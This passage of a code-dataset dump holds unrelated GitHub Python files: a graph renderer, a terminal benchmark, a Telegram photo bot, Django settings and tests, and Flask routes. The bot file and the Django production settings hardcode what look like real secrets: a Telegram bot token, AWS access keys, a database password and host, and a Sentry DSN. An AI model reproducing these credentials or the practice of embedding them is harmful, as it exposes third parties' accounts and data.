visualization.py","file_name":"digit visualization.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27017476374","text":"import os\nimport sys\nimport pygraphviz as pgv\n\ndef render_dot_file(dot_file, output_file):\n try:\n # Check if the input file exists\n if not os.path.isfile(dot_file):\n raise IOError(f'{dot_file} does not exist')\n\n # Read the DOT file\n g = pgv.AGraph(dot_file)\n\n # Check if the output file exists\n if os.path.isfile(output_file):\n raise IOError(f'{output_file} already exists')\n\n # Render the graph\n g.draw(output_file, format='png')\n\n except IOError as e:\n # Handle I/O errors\n print(f'Error: {e}')\n\n except pgv.error.Error as e:\n # Handle errors from pygraphviz\n print(f'Error: {e}')\n\n# Example usage\ndot_file = sys.argv[1]\noutput_file = sys.argv[2]\n\n# If no output file was specified, use the same filename as the input file\n# but with a .png extension\nif not output_file:\n output_file = os.path.splitext(dot_file)[0] + '.png'\n\nrender_dot_file(dot_file, output_file)\n","repo_name":"RohitDashora/datarbricks-terraform-modules","sub_path":"scripts/rander_tf_plan/randerdot.py","file_name":"randerdot.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71387204329","text":"import sys\nimport os\n\nfrom curtsies.fmtfuncs import blue, red, bold, on_red\n\nfrom curtsies.window import FullscreenWindow\n\nimport time\n\nif __name__ == '__main__':\n\n print(blue('hey') + ' ' + red('there') + ' ' + red(bold('you')))\n n = int(sys.argv[1]) if len(sys.argv) > 1 else 100\n\n with FullscreenWindow() as window:\n rows, columns = window.get_term_hw()\n t0 = time.time()\n for i in range(n):\n a = [blue(on_red('qwertyuiop'[i%10]*columns)) for _ in range(rows)]\n window.render_to_terminal(a)\n t1 = time.time()\n t2 = time.time()\n for i in range(n):\n a = [blue(on_red('q'[i%1]*columns)) for _ in range(rows)]\n window.render_to_terminal(a)\n t3 = time.time()\n t4 = time.time()\n a = [blue(on_red('q'*columns)) for _ in range(rows)]\n arrays = []\n for i in range(n):\n a[i // columns] = a[i // columns].setitem(i % columns, 'x')\n arrays.append([fs.copy() for fs in a])\n for i in range(n):\n window.render_to_terminal(arrays[i])\n t5 = time.time()\n\n s = \"\"\" all different: %f\\tall identical: %f\\tchange on character %f\\t%d iterations\\t\"\"\" % (t1 - t0, t3 - t2, t5 - t4, n)\n os.system('echo `git log --pretty=oneline -n 1` '+s+' >> times.txt')\n print(s)\n","repo_name":"bpython/curtsies","sub_path":"examples/testcache.py","file_name":"testcache.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":218,"dataset":"github-code","pt":"53"} +{"seq_id":"17063806506","text":"\nnumbers=['1','2','3','4','5','6','7','8','9','0']\nsymbols=list(string.punctuation)\nalpha=list(string.ascii_lowercase)\nspace=[\" \"]\n\nalphabet=alpha+space+numbers+symbols+alpha+space+numbers+symbols\n\nprint(alphabet)\n\n\n\nwindow=Tk()\n\nwindow.title(\"CEASER CIPHER\")\nwindow.geometry(\"300x400\")\nwindow.config(padx=20,pady=20,bg=BACKGROUND_COLOR)\n\n# ------------------- FUNCTION -----------------------\n\ndef cipher(*args):\n\tglobal alphabet\n\tend_text=\"\"\n\n\tword=ent.get()\n\tshift=ent2.get()\n\n\n\tfor letter in word:\n\n\t\tpos=alphabet.index(letter)\n\n\t\tif args[0]==\"decrypt\":\n\t\t\tnew_pos=pos-shift\n\t\telse:\n\t\t\tnew_pos=pos+shift\n\n\t\tnew_letter=alphabet[new_pos]\n\n\t\tend_text+=new_letter","repo_name":"Joshua357954/100-days-of-code-challange","sub_path":"Day 8/zap.py","file_name":"zap.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73368447208","text":"import sys\nsys.path.insert(0, '../_common');\n\nimport bioinf\n\ndef main():\n f_input = open('input.txt', 'r')\n dna = f_input.read()\n f_input.close();\n rna = bioinf.transcript(dna);\n f_output = open('output.txt','w');\n f_output.write(rna);\n f_output.close();\n\nmain();","repo_name":"avejant0/RosalindInfo-Solutions-python","sub_path":"rna/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8825732614","text":"import io\n\nfrom django.apps import apps\nfrom rest_framework.test import APITestCase\n\nfrom api.applications.models import ApplicationCompanyDocument\nfrom api.applications.services.create_application_company_documents import ApplicationCompanyDocumentsService\nfrom api.applications.tests.factories import ApplicationFactory\nfrom api.companies.models import CompanyDocument\nfrom api.documents.tests.factories import DocumentFactory\nfrom api.libs.sidecar_blocks.document_store.document_api import DocumentData\nfrom api.partners.tests.factories import CompanyFactory, UserFactory, CompanyUserFactory, FundFactory\n\n\ndef create_document_path(contents=None):\n if not contents:\n contents = b\"The greatest document in human history\"\n config = apps.get_app_config('documents')\n upload_context = config.context\n document_api = config.document_api\n content_type = \"application/text\"\n origin_file_obj = io.BytesIO(contents)\n document_data = DocumentData(content_type, origin_file_obj)\n document_path = document_api.upload(upload_context, document_data)\n return document_path\n\n\nclass ApplicantCompanyDocumentTestCase(APITestCase):\n\n def setUp(self):\n self.company = CompanyFactory()\n self.user_1 = UserFactory()\n self.user_2 = UserFactory()\n self.company_user_1 = CompanyUserFactory(company=self.company, user=self.user_1)\n self.company_user_2 = CompanyUserFactory(company=self.company, user=self.user_2)\n self.fund = FundFactory(company=self.company)\n self.document_path = create_document_path()\n\n def test_required_once_document(self):\n document = DocumentFactory(document_path=self.document_path)\n company_document = CompanyDocument.objects.create(\n company=self.company,\n document=document,\n name='Dummy Document',\n description='Dummy Document',\n required_once=True,\n require_wet_signature=True,\n require_gp_signature=True,\n )\n\n application_1 = ApplicationFactory(company=self.company, user=self.user_1, fund=self.fund)\n application_2 = ApplicationFactory(company=self.company, user=self.user_2, fund=self.fund)\n\n ApplicationCompanyDocument.objects.create(\n application=application_1,\n company_document=company_document,\n completed=True\n )\n\n application_2_documents = ApplicationCompanyDocumentsService(\n application=application_2\n ).get_documents()\n\n self.assertEqual(application_2_documents[0]['company_document']['id'], company_document.id)\n","repo_name":"tayyabsaleem7756/jobtest","sub_path":"backend/retail_market/api/applications/tests/services/test_applicant_company_document_query.py","file_name":"test_applicant_company_document_query.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17819287580","text":"from aiogram import Bot, types\nfrom aiogram.dispatcher import Dispatcher\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage # оперативна пам'ять\nfrom aiogram import executor\nfrom aiogram.dispatcher.filters.state import StatesGroup, State # стан\nfrom data_managment import create_table\nfrom buttons import inl_menu\nimport requests\nimport os\nimport shutil\nfrom aiogram.dispatcher import FSMContext\nfrom pydrive.auth import GoogleAuth\nfrom pydrive.drive import GoogleDrive\nimport io\nfrom photo_transfer import photo_transfer\nfrom oauth2client.service_account import ServiceAccountCredentials\n\ngauth = GoogleAuth()\nscope = [\"https://www.googleapis.com/auth/drive\"]\ngauth.credentials = ServiceAccountCredentials.from_json_keyfile_name('client_secrets.json', scope)\ndrive = GoogleDrive(gauth)\n\nprint('login saccc')\n\nBOT_TOKEN = '5675794527:AAHSjUvT1UQOxRFJYRiok4eBa4m6h3v-Fqo'\n\nbot = Bot(token=BOT_TOKEN)\ndp = Dispatcher(bot, storage=MemoryStorage())\n\ncallback_data = {}\n\nclass States(StatesGroup):\n\tphoto_send = State()\n\n\n@dp.message_handler(commands=['start'], state='*')\nasync def process_start_command(message: types.Message):\n\tawait bot.send_message(message.chat.id, 'Прогрес вашого проходження марафону:', reply_markup=inl_menu)\n\tawait bot.send_message(message.chat.id, 'Вітаю! Оберіть пункт котрий ви виконали ⬆')\n\n@dp.message_handler(content_types=['photo'], state=States.photo_send)\nasync def get_photo(message: types.Message, state: FSMContext):\n\n\tcreate_table(message.from_user.id)\n\n\tuser_id = message.from_user.id\n\tdata = callback_data.get(user_id, {}) # порожній словник {} за замовчуванням.\n\ttopic = data.get('topic', 'невідомо') # \"невідомо\" стоїть напевно на випадок помилки\n\n\tlocal_file_path = f'https://drive.google.com//drive//folders//maraphon//{str(user_id)}//{topic}//'\n\n\tphoto_folder = photo_transfer(user_id, topic, drive)\n\n\tphoto = message.photo[-1] # Отримайте останню фотографію з повідомлення\n\tfile_info = await bot.get_file(photo.file_id)\n\n\t# Отримайте URL-адресу файлу фотографії на сервері Telegram\n\tfile_url = file_info.file_path\n\tresponse = requests.get(f'https://api.telegram.org/file/bot{BOT_TOKEN}/{file_url}')\n\tprint(photo_folder)\n\n\tfile1 = drive.CreateFile({'title': f'{message.photo[0].file_id}' + '.png',\n\t\t\t\t\t\t\t 'parents': [{'id': photo_folder}]}) # Create GoogleDriveFile instance with title 'Hello.txt'.\n\tfile1.content = io.BytesIO(response.content) # Set content of the file from given string.\n\tfile1.Upload()\n\n\tawait bot.send_message(message.chat.id, 'фото отримав')\n\tawait state.finish()\n\n@dp.callback_query_handler(text=['wake', 'exercise', 'water', 'read', 'steps'])\nasync def callback_retarget(call: types.CallbackQuery):\n\tif call.data == 'wake':\n\t\tcallback_data[call.from_user.id] = {'topic': 'підйом'}\n\t\tawait call.message.answer('Відправте фото виконаного завдання')\n\t\tawait States.photo_send.set()\n\tif call.data == 'exercise':\n\t\tcallback_data[call.from_user.id] = {'topic': 'ранкові вправи'}\n\t\tawait call.message.answer('Відправте фото виконаного завдання')\n\t\tawait States.photo_send.set()\n\tif call.data == 'water':\n\t\tawait call.message.answer('Відправте фото виконаного завдання')\n\tif call.data == 'read':\n\t\tawait call.message.answer('Відправте фото виконаного завдання')\n\tif call.data == 'steps':\n\t\tawait call.message.answer('Відправте фото виконаного завдання')\n\n\nif __name__ == \"__main__\":\n\texecutor.start_polling(dp, skip_updates=True)","repo_name":"Vishta28/bot_send_photo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3830,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74370366567","text":"import logging\nfrom datetime import datetime, date\n\nfrom banal import ensure_list\nfrom normality import stringify\nfrom followthemoney import model\n\nlog = logging.getLogger(__name__)\n\n\nclass TimestampSupport(object):\n \"\"\"Provides helpers for date and time parsing.\"\"\"\n TIMESTAMP_FORMATS = (\n '%Y-%m-%dT%H:%M:%S',\n '%Y-%m-%d %H:%M:%S',\n '%Y:%m:%d %H:%M:%S',\n '%Y-%m-%dT%H:%M:%SZ',\n '%Y-%m-%dT%H:%M:%S%z',\n '%Y:%m:%d %H:%M:%SZ', # exif\n '%Z %Y-%m-%d %H:%M:%S',\n '%Y-%m-%d',\n '%Y%m%d',\n )\n\n def parse_timestamp(self, raw, fmt=None):\n if isinstance(raw, (datetime, date)):\n return raw\n text = stringify(raw)\n if text is None:\n return\n formats = ensure_list(fmt) or self.TIMESTAMP_FORMATS\n for fmt in formats:\n try:\n if '.' in text and '.' not in fmt:\n text, _ = text.split('.', 1)\n return datetime.strptime(text, fmt)\n except Exception:\n pass\n log.warning(\"Could not parse timestamp: %r\", raw)\n return raw\n\n def get_seconds(self, time_str):\n \"\"\"Get Seconds from time\"\"\"\n h, m, s = time_str.split(':')\n return float(h) * 3600 + float(m) * 60 + float(s)\n\n\nclass CellebriteXMLSupport(object):\n NS = \"http://pa.cellebrite.com/report/2.0\"\n NSMAP = {\"ns\": NS}\n\n def _item(self, meta, name):\n query = './ns:item[@name=\"%s\"]/text()' % name\n return meta.xpath(query, namespaces=self.NSMAP)\n\n def _ns_tag(self, tag):\n return '{{{0}}}{1}'.format(self.NS, tag)\n\n def _field_values(self, el, name):\n query = './ns:field[@name=\"%s\"]/ns:value/text()' % name\n values = []\n for value in el.xpath(query, namespaces=self.NSMAP):\n value = stringify(value)\n if value is not None:\n values.append(value)\n return list(sorted(values))\n\n def _models(self, el, name):\n query = \".//ns:model[@type='%s']\" % name\n yield from el.xpath(query, namespaces=self.NSMAP)\n\n def _get_party(self, names, identifiers, proof=None):\n party = model.make_entity('LegalEntity')\n if not names:\n names = identifiers\n party.add('name', names)\n party.add('country', self.country)\n party.add('proof', proof)\n\n for identifier in sorted(identifiers, key=len, reverse=True):\n prop = 'email' if '@' in identifier else 'phone'\n party.add(prop, identifier)\n if not party.id and party.get(prop):\n party.make_id(self.project_id, identifier)\n\n if not party.id and names:\n party.make_id(self.project_id, *ensure_list(names))\n\n return party\n","repo_name":"alephdata/followthemoney-cellebrite","sub_path":"ftmcellebrite/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72618330407","text":"from django.conf.urls import url,include\nfrom apps.profesores.views import index_profesor, nuevo_profesor,editar_profesor,eliminar_profesor\n\n\nurlpatterns = [\n url(r'^$', index_profesor, name='index_profesor'),\n url(r'^nuevo$', nuevo_profesor, name='nuevo_profesor'),\n url(r'^editar/(?P\\d+)/$', editar_profesor, name='editar_profesor'),\n url(r'^eliminar/(?P\\d+)/$', eliminar_profesor, name='eliminar_profesor'),\n]\n","repo_name":"defcon1983/project_bro_universidad","sub_path":"softcole-master/apps/profesores/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34241683823","text":"def checkbin():\n\tl=['0','1']\n\tf=0\n\tst=input()\n\tfor i in range(len(st)):\n\t\tif st[i] in l:\n\t\t\tcontinue\n\t\telse :\n\t\t\tf=1\n\t\t\tbreak\n\tif f!=1:\n\t\tprint('yes')\n\telse :\n\t\tprint('no')\n","repo_name":"Seetha1231/oddeven","sub_path":"be62.py","file_name":"be62.py","file_ext":"py","file_size_in_byte":173,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18324746693","text":"#输入某年某月��日,判断这一天是这一年的第几天?\n# year = int(input('请输入年份:'))\n# month = int(input('请输入月份:'))\n# if month >12:\n# print('请输入正确的月份')\n# day = int(input('请输入日期:'))\n# month_1 = [1,3,5,7,8,10,12]\n# month_2 = [4,6,9,11]\n# count_1 = 0\n# count_2 = 0\n# for i in range(1,month):\n# if i in month_1:\n# count_1 +=1\n# if i in month_2:\n# count_2 +=1\n# if month > 2:\n# if (year % 400 == 0) or ((year % 4 == 0) and (year % 100 != 0)):\n# days = count_1 * 31 + count_2 * 30 + day + 29\n# else:\n# days = count_1 * 31 + count_2 * 30 + day + 28\n# else:\n# days = day+31\n# print(days)\n\nyear = int(input('year: '))\nmonth = int(input('month: '))\nday = int(input('day: '))\n\nmonths = (0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334)\nif 0 < month <= 12:\n sum = months[month - 1]\nelse:\n print('data error')\nsum += day\nleap = 0\nif (year % 400 == 0) or ((year % 4 == 0) and (year % 100 != 0)):\n leap = 1\nif (leap == 1) and (month > 2):\n sum += 1\nprint('it is the %dth day.' % sum)\n\n\n\n\n\n\n\n","repo_name":"rage-vampire/Python","sub_path":"practise/Python应用实例/test22.py","file_name":"test22.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15124238492","text":"# Processing Raw Text(Tokenization & Stemming)\n\nimport nltk\nfrom __future__ import division\nimport re, pprint\n\n# Tokenization\ntokens = nltk.word_tokenize(\"hello world this is a nice day, hello world again\")\n# this is just a list\ntype(tokens)\ntokens\n# to make it be able to processed by techniques in Chapter I, put the tokenized tokens into nltk.Text()\ncorpus = nltk.Text(tokens)\ntype(corpus)\ncorpus[0]\ntokens.collocations()\ntokens.concordance(\"is\")\n# Customized Tokenization with RegEx\n# Noted!! -> (...) must be non-capture parenthesis(prefix with ?: such as (?:...)\ntext = 'That U.S.A. poster-print costs $12.40... , .'\npattern = r'''(?x) # set flag to allow comments\n (?:[A-Z]\\.)+ # abbreviations, e.g. U.S.A.\n |\\.\\.\\. # capture ...\n |\\w+(?:-\\w+)* #word with optional hyphens\n |\\$?\\d+(?:\\.\\d+)?%? # currency and percentages, e.g. $12.40, 82%\n | [][.,;\"'?():-_`] # these are separate tokens\n'''\nregexTokenizer = nltk.tokenize.RegexpTokenizer(pattern)\nregexTokenizer.tokenize(text)\n# Off-the-self Tokenizer -> split some punctuations and also keep them\n# May not be good enough...\nnltk.word_tokenize(\"hello ; hello; hello. . this.is this's\")\n\n# load gutenberg corpus\nfrom nltk.corpus import gutenberg\ngutenberg.fileids()\ncorpus = nltk.Text(gutenberg.words('melville-moby_dick.txt'))\ncorpus.collocations()\n# regular expression\n# (...) returned only words in (...)\ncorpus.findall(r\" (<.*>) \")\ncorpus.findall(r\" (<.*>) \")\ncorpus.findall(r\"<.*> <.*> \")\n\n# Text Normalization\nraw = \"\"\"DENNIS: Listen, strange women lying in ponds distributing swords\nis no basis for a system of government. Supreme executive power derives from\na mandate from the masses, not from some farcical aquatic ceremony.\"\"\"\ntokens = nltk.word_tokenize(raw)\ntokens\n# Porter Stemmers -> good for word indexing, information retrieval\nporter = nltk.PorterStemmer()\nstems = [porter.stem(t) for t in tokens]\nzip(tokens,stems)\n# WordNet Lemmatization -> good for pairing with WordNet relationship lookup\nwordNetStemmer = nltk.WordNetLemmatizer()\nstems = [wordNetStemmer.lemmatize(t) for t in tokens]\nzip(tokens,stems)","repo_name":"vitid/PythonNLTK","sub_path":"nltk_chapter3.py","file_name":"nltk_chapter3.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17640507535","text":"import sqlite3\n\nconn = sqlite3.connect('drill_1.db')\n\nwith conn:\n cur = conn.cursor()\n cur.execute(\"CREATE TABLE IF NOT EXISTS tbl_fList\\\n (ID INTEGER PRIMARY KEY AUTOINCREMENT, \\\n col_fileN TEXT \\\n )\")\n conn.commit()\n\n\n\nfileList = ('information.docx','Hello.txt','myImage.png', \\\n 'myMovie.mpg','World.txt','data.pdf','myPhoto.jpg')\nwith conn:\n for file in fileList:\n if file.endswith('.txt'):\n cur = conn.cursor()\n cur.execute(\"INSERT INTO tbl_fList(col_fileN) VALUES (?)\", \\\n (file,))\n print (file)\n \n\n \n\n\n","repo_name":"jlefler24/Python-Coding-Projects","sub_path":"sql_drill.py","file_name":"sql_drill.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73136012007","text":"from bisect import bisect_left\n\nn = int(input())\nports = list(map(int, input().split()))\n\n# 가장 긴 증가하는 부분 수열 \nresult = []\nfor port in ports:\n if len(result) == 0 or result[-1] < port:\n result.append(port)\n else:\n idx = bisect_left(result, port)\n result[idx] = port\n \nprint(len(result))\n","repo_name":"juajang/algorithm","sub_path":"Etc/반도체 설계.py","file_name":"반도체 설계.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74824159207","text":"from flask import Blueprint, request, jsonify, make_response\nfrom app import db\nfrom app.models.survey import Survey\nfrom .route_helpers import validate_model\nfrom sqlalchemy import desc\n\nsurveys_bp = Blueprint(\"survey\", __name__, url_prefix=\"/surveys\")\n\n\n@surveys_bp.route(\"\", methods=[\"GET\"])\ndef get_all_surveys():\n query = Survey.query\n\n survey_query = query.order_by(desc(Survey.date_survey_completed))\n\n surveys_response = [survey.to_dict() for survey in survey_query]\n\n return make_response(jsonify(surveys_response), 200)\n\n\n@surveys_bp.route(\"\", methods=[\"POST\"])\ndef create_survey():\n request_body = request.get_json()\n\n new_survey = Survey.from_dict(request_body)\n\n db.session.add(new_survey)\n db.session.commit()\n\n return jsonify(new_survey.to_dict()), 201\n\n\n@surveys_bp.route(\"/\", methods=[\"PUT\"])\ndef update_survey(survey_id):\n updated_survey = validate_model(Survey, survey_id)\n\n request_body = request.get_json()\n updated_survey.update_from_dict(request_body)\n\n db.session.commit()\n\n return jsonify(updated_survey.to_dict()), 200\n\n\n@surveys_bp.route(\"/\", methods=[\"DELETE\"])\ndef delete_survey(survey_id):\n survey_to_delete = validate_model(Survey, survey_id)\n\n db.session.delete(survey_to_delete)\n db.session.commit()\n\n return make_response(\n jsonify({\"details\": f\"Survey {survey_id} successfully deleted\"}), 200\n )\n\n\n@surveys_bp.route(\"/\", methods=[\"PATCH\"])\ndef update_payment_balance(survey_id):\n survey = validate_model(Survey, survey_id)\n\n request_body = request.get_json()\n survey.update_from_dict(request_body)\n\n db.session.commit()\n\n return jsonify(survey.to_dict()), 200\n","repo_name":"adom2128/back-end-fgtracker","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5672151462","text":"# -*- coding: utf-8 -*-\nfrom .base import os, BASE_DIR, INSTALLED_APPS\nimport raven\n\nDEBUG = False\nALLOWED_HOSTS = ['*']\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'ebdb',\n 'USER': 'ebroot',\n 'PASSWORD': 'wodnjs2010',\n 'HOST': 'aa83nchg88wbbd.chhv3epwywiz.ap-northeast-2.rds.amazonaws.com',\n 'PORT': 3306,\n }\n}\n\nif 'RDS_DB_NAME' in os.environ:\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': os.environ['RDS_DB_NAME'],\n 'USER': os.environ['RDS_USERNAME'],\n 'PASSWORD': os.environ['RDS_PASSWORD'],\n 'HOST': os.environ['RDS_HOSTNAME'],\n 'PORT': os.environ['RDS_PORT'],\n }\n }\n\nSTATICFILES_DIRS = (\n os.path.join(BASE_DIR, 'static'),\n)\n\nAWS_ACCESS_KEY_ID = 'AKIAIQ2DFL37RSVEDTAA'\nAWS_SECRET_ACCESS_KEY = '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'\n\nAWS_FILE_EXPIRE = 200\nAWS_PRELOAD_METADATA = False\nAWS_QUERYSTRING_AUTH = False\n\nDEFAULT_FILE_STORAGE = 'socialup.utils.MediaRootS3BotoStorage'\nSTATICFILES_STORAGE = 'socialup.utils.StaticRootS3BotoStorage'\nAWS_STORAGE_BUCKET_NAME = 'social-up'\nS3DIRECT_REGION = 'ap-northeast-2'\nS3_URL = '//%s.s3.amazonaws.com/' % AWS_STORAGE_BUCKET_NAME\nMEDIA_URL = 'https://%s.s3.amazonaws.com/media/' % AWS_STORAGE_BUCKET_NAME\nMEDIA_ROOT = MEDIA_URL\nSTATIC_URL = S3_URL + 'static/'\nADMIN_MEDIA_PREFIX = STATIC_URL + 'admin/'\n\nAWS_S3_HOST = 's3.%s.amazonaws.com' % S3DIRECT_REGION\n\nimport datetime\n\ntwo_months = datetime.timedelta(days=61)\ndate_two_months_later = datetime.date.today() + two_months\nexpires = date_two_months_later.strftime(\"%A, %d %B %Y 20:00:00 GMT\")\n\nAWS_HEADERS = {\n 'Expires': expires,\n 'Cache-Control': 'max-age=%d' % (int(two_months.total_seconds()),),\n}\n\n\ndef static_url(url):\n return os.path.join(STATIC_URL, url)\n\n\nSUMMERNOTE_CONFIG = {\n 'iframe': True,\n 'width': '100%',\n 'lang': 'ko-KR',\n 'attachment_require_authentication': True,\n 'default_css': (\n '/static/css/bootstrap.min.css',\n static_url('django_summernote/summernote.css'),\n static_url('django_summernote/django_summernote.css'),\n ),\n 'default_js': (\n '/static/js/jquery-2.2.4.min.js',\n '/static/js/bootstrap.min.js',\n static_url('django_summernote/jquery.ui.widget.js'),\n static_url('django_summernote/jquery.iframe-transport.js'),\n static_url('django_summernote/jquery.fileupload.js'),\n static_url('django_summernote/summernote.min.js'),\n ),\n}\n\nINSTALLED_APPS += ['raven.contrib.django.raven_compat', ]\n\n# sentry settings\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': True,\n 'root': {\n 'level': 'INFO',\n 'handlers': ['sentry'],\n },\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s '\n '%(process)d %(thread)d %(message)s'\n },\n },\n 'handlers': {\n 'sentry': {\n 'level': 'INFO',\n 'class': 'raven.contrib.django.raven_compat.handlers.SentryHandler',\n 'tags': {'custom-tag': 'x'},\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'verbose'\n }\n },\n 'loggers': {\n 'django.db.backends': {\n 'level': 'ERROR',\n 'handlers': ['console'],\n 'propagate': False,\n },\n 'raven': {\n 'level': 'DEBUG',\n 'handlers': ['console'],\n 'propagate': False,\n },\n 'sentry.errors': {\n 'level': 'DEBUG',\n 'handlers': ['console'],\n 'propagate': False,\n },\n },\n}\n\nRAVEN_CONFIG = {\n 'dsn': 'https://39c4c5642dae45a9a7bb5ade5234bda7:cd3ea0be19f64a8a917692d16d305a39@sentry.io/134317',\n}\n","repo_name":"springkjw/socialup","sub_path":"socialup/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":3872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33383807851","text":"\"\"\"2020 카카오 신입 개발자 블라인드 테스트 4: 가사 검색\n\n* 핵심 아이디어:\n 1. 쿼리의 중복이 가능하기 때문에 꼭 쿼리에 대한 memoization을 실시한다.\n\n* 알고리즘 순서:\n 1. 완전 탐색: 70점. 효율성 탈락\n 2. Trie 자료구조 사용: 100점\n\n\n문제 URL: https://programmers.co.kr/learn/courses/30/lessons/60060\n\"\"\"\n# 1. Exhaustive search solution\ndef solution(words, queries):\n query_dict = {}\n ans = []\n\n def match_or_not(word, query):\n if len(word) != len(query):\n return False\n\n wildcard_count = query.count('?')\n if query.startswith('?'): # 접두사\n return word[wildcard_count:] == query[wildcard_count:]\n else:\n return word[:len(word)-wildcard_count] == query[:len(word)-wildcard_count]\n\n for query in queries:\n if query in query_dict:\n ans.append(query_dict[query])\n continue\n\n count = sum(match_or_not(word, query) for word in words)\n ans.append(count)\n query_dict[query] = count\n\n return ans\n\n\n# 2. Trie 자료구조 이용\nclass Trie:\n def __init__(self, char=''):\n self.children = {}\n self.count = 0\n self.char = char\n\n\ndef solution(words, queries):\n MAX_SIZE = 10000\n tries = [Trie() for _ in range(MAX_SIZE+1)]\n tries_reversed = [Trie() for _ in range(MAX_SIZE+1)]\n ans = []\n\n for word_now in words:\n W = len(word_now)\n node = tries[W]\n node_reversed = tries_reversed[W]\n word_reversed = word_now[::-1]\n\n for word, node in ((word_now, node), (word_reversed, node_reversed)):\n for c in word:\n node.count += 1\n if c in node.children:\n node = node.children[c]\n else:\n new_node = Trie(c)\n node.children[c] = new_node\n node = new_node\n\n\n def count_match(query, wildcard_at_last=False):\n N = len(query)\n node = tries[N] if wildcard_at_last else tries_reversed[N]\n query = query if wildcard_at_last else query[::-1]\n\n for c in query:\n if c != '?':\n if c not in node.children:\n return 0\n node = node.children[c]\n else:\n break\n\n return node.count\n\n return [count_match(query, wildcard_at_last=query.endswith('?')) for query in queries]\n","repo_name":"shoark7/algorithm-with-python","sub_path":"problems_solving/kakao/2020-blind-algorithm-test/q4_lyrics_search.py","file_name":"q4_lyrics_search.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"37093845152","text":"from flask import Blueprint, jsonify, request\nimport asyncio\nfrom database.db import conn\nimport pandas as pd\nimport json\n\nimport os\nfrom os import getcwd\nfrom werkzeug.utils import secure_filename\n\nloop2 = asyncio.get_event_loop()\n\nmain=Blueprint('FileActionForecast_blueprint', __name__)\n\n@main.route('/NIKE/', methods=['POST'])\ndef add_file(year):\n try:\n parent_dir = \"D:\\\\Apps\\\\MasterApp\\\\back-app\\\\Files\\\\Cycle\\\\Forecast\"\n v_path = os.path.join(parent_dir, str(year))\n contenido = os.listdir(parent_dir)\n if(len(contenido) == 0):\n os.mkdir(v_path)\n else:\n for fichero in contenido:\n if not str(year) in fichero:\n os.mkdir(v_path)\n x = request.files['File']\n filename = x.filename\n url = os.path.join(v_path, secure_filename(filename))\n x.save(url)\n with open('D:\\\\Apps\\\\MasterApp\\\\back-app\\\\routes\\\\File_ForecastName.json') as file:\n data = json.load(file)\n\n df = pd.DataFrame()\n for a in range(len(data)):\n if data[a]['Customer'] == 'NIKE':\n for b in range(len(data[a]['Container']['Sheets'])):\n dct = {v: k for k, v in data[a]['Container']['Sheets'][b]['Column'].items()}\n file = open(url, \"rb\")\n z1 = pd.read_excel(file, sheet_name=data[a]['Container']['Sheets'][b]['Name'], header=data[a]['Container']['Sheets'][b]['PositionTitle'], usecols=list(data[a]['Container']['Sheets'][b]['Column'].values()) )\n file.close()\n z1 = z1.rename(dct, axis=1) \n if (len(df) == 0):\n df = z1\n else:\n df = pd.concat([df, z1], ignore_index=True)\n df = df.fillna({'QuantityRequested':0})\n df.drop(df[(df['QuantityRequested'] == 0)].index, inplace=True)\n textSQL = \"\"\"\n SELECT Style_GeneralInfo.StyleName, Style_WorkCenter.Style_WorkCenter, Style_GlobalCategory2.GlobalCategory, Style_Customer.Style_Customer\n FROM Style_GlobalCategory2\n INNER JOIN Style_Customer ON Style_GlobalCategory2.Id_Style_Customer = Style_Customer.Id_Style_Customer\n INNER JOIN Style_WorkCenter ON Style_GlobalCategory2.Id_Style_GlobalCategory = Style_WorkCenter.Id_Style_GlobalCategory\n INNER JOIN Style_GeneralInfo ON 